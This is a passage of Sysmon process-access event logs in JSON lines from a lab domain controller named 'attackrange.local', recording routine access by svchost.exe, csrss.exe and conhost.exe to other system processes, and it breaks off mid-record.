{"EventTime":"2020-08-01 08:03:08","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6421,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:03:08.570\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:03:08.570","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:03:08","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:03:08","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6422,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:03:08.570\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:03:08.570","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:03:08","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:03:08","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6423,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:03:08.570\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 664\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-21BC-5F25-0000-00102BB20900}\r\nTargetProcessId: 2940\r\nTargetImage: C:\\Windows\\system32\\conhost.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\SYSTEM32\\CSRSRV.dll+1a30|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5c09|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:03:08.570","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"664","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-21BC-5F25-0000-00102BB20900}","TargetProcessId":"2940","TargetImage":"C:\\Windows\\system32\\conhost.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\SYSTEM32\\CSRSRV.dll+1a30|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5c09|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:03:08","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:03:08","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6424,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:03:08.570\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00102BB20900}\r\nSourceProcessId: 2940\r\nSourceThreadId: 3308\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {41C8662E-21BC-5F25-0000-00108DB10900}\r\nTargetProcessId: 3900\r\nTargetImage: C:\\Windows\\System32\\XblGameSaveTask.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:03:08.570","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00102BB20900}","SourceProcessId":"2940","SourceThreadId":"3308","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{41C8662E-21BC-5F25-0000-00108DB10900}","TargetProcessId":"3900","TargetImage":"C:\\Windows\\System32\\XblGameSaveTask.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:03:08","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:03:08","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6425,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:03:08.585\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-001044B90000}\r\nTargetProcessId: 1140\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:03:08.585","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-001044B90000}","TargetProcessId":"1140","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:03:08","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:03:08","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6426,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:03:08.585\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-001044B90000}\r\nTargetProcessId: 1140\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:03:08.585","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-001044B90000}","TargetProcessId":"1140","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:03:08","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:03:08","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6427,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:03:08.585\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-001044B90000}\r\nTargetProcessId: 1140\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:03:08.585","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-001044B90000}","TargetProcessId":"1140","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:03:08","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:03:08","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6428,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:03:08.585\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-001044B90000}\r\nTargetProcessId: 1140\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:03:08.585","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-001044B90000}","TargetProcessId":"1140","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:03:08","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:03:08","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6429,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:03:08.585\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-001044B90000}\r\nTargetProcessId: 1140\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:03:08.585","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-001044B90000}","TargetProcessId":"1140","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4